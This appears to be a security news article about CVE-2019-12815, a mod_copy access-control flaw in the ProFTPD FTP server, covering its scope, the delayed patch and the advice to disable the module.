A significant vulnerability has been exposed in one of the most widely used FTP server applications, ProFTPD, affecting over one million servers globally. The discovery, made by German security researcher Tobias Mädel, highlights a critical flaw within the mod_copy module, a feature that allows users to copy files and directories on a server without the need to transfer data back and forth.
ProFTPD is an open-source FTP server utilized by numerous businesses and websites, including prominent names like SourceForge and Slackware. Often pre-installed with various Linux and Unix distributions, such as Debian, the software is deeply embedded in many server infrastructures worldwide.
The identified vulnerability stems from inadequate access controls in the mod_copy module. An authenticated user could exploit this gap to copy files into locations on the server where they typically do not have write permissions. Under certain conditions, this flaw might also facilitate remote code execution or information disclosure, increasing the risk of severe security breaches.
According to insights from John Simpson, a security expert at Trend Micro, for an attacker to achieve remote code execution, they would need the capability to copy a malicious PHP file into an executable directory on the server. It is important to underscore that not all installations of ProFTPD are vulnerable to remote exploitation; compromised access to the server is a prerequisite. Specifically, this means that attackers must either possess direct login credentials or the server must allow anonymous access.
This vulnerability has been classified under CVE-2019-12815, which affects all ProFTPD versions, including the latest 1.3.6 version released in 2017. Given that the mod_copy module is typically enabled by default, the potential for widespread impact on servers utilizing ProFTPD is considerable.
Interestingly, this recent identification of vulnerabilities aligns with a previously reported issue, CVE-2015-3306, which also targeted the mod_copy module, allowing unauthorized file access via specific FTP commands. After Mädel’s initial report to the ProFTPD maintainers in September of the previous year, there was an alarming delay of over nine months in addressing this serious vulnerability. Following an outreach to the Debian Security Team last month, the ProFTPD development team issued a patch for the vulnerability, backporting it to the original version without issuing a formal release.
To mitigate potential exploitation of this flaw, server administrators are advised to disable the mod_copy module within their ProFTPD configuration files as a precautionary measure.
In analyzing the tactics that could be employed in such attacks, the MITRE ATT&CK framework suggests that adversaries might resort to initial access, persistence, and privilege escalation techniques. These tactics would facilitate unauthorized user actions, potentially leading to significant disruptions in service and breaches of sensitive information.
The ProFTPD incident serves as a stark reminder of the vulnerabilities that exist in widely used software and the imperative for robust security practices in server management. It is crucial for business owners to stay informed about such developments and take proactive measures to safeguard their systems against potential exploitation.